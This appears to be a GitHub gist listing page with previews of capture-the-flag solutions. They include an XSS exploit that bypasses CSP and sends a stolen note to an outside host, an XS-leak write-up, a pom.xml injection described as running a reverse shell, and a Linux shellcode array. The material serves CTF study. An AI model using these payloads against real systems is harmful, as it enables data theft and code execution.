Skip to content

Instantly share code, notes, and snippets.

View msrkp's full-sized avatar
🚩
Trying harder

s1r1us msrkp

🚩
Trying harder
View GitHub Profile
@msrkp
msrkp / exp.html
Created August 24, 2020 01:48
Google CTF All the Little Things solution
<!DOCTYPE html>
<html>
<head>
<script>
x= `
<iframe name=x title='fetch(&#x22;/note&#x22;).then(x=>x.text()).then(x=>top.location=&#x22;//ctf.s1r1us.ninja?html=&#x22;+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe>
@msrkp
msrkp / exp.md
Last active July 30, 2023 15:20
LineCTF - Your Note script to perform XS-leaks to read the flag.

XS-leaks while download in headless-chrome.

TL;DR

There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q exists in notes.

Download doesn't work in headless chrome, so it throws an error.

oracle

  page.goto(url).then(() => {
@msrkp
msrkp / sol.md
Last active May 16, 2021 13:36
OMH CTF Solutions

code_review solution

Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell

<plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <version>2.22.2</version>
                <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
 <plugin>
                <groupId>org.codehaus.mojo</groupId>
@msrkp
msrkp / keybase.md
Created August 29, 2021 04:28
keybase.md

Keybase proof

I hereby claim:

  • I am msrkp on github.
  • I am s1r1us (https://keybase.io/s1r1us) on keybase.
  • I have a public key whose fingerprint is 00AD 378C CEB2 0955 8E61 4EED 5386 F2DB 6741 F532

To claim this, I am signing this object:

@msrkp
msrkp / shellcode.js
Created January 9, 2024 14:33
shellcod linux
let shellcode = [2.40327734437787e-310, -1.1389104046892079e-244, 3.1731330715403803e+40, 1.9656830452398213e-236, 1.288531947997e-312, 8.3024907661975715e+270, 1.6469439731597732e+93, 9.026845734376378e-308];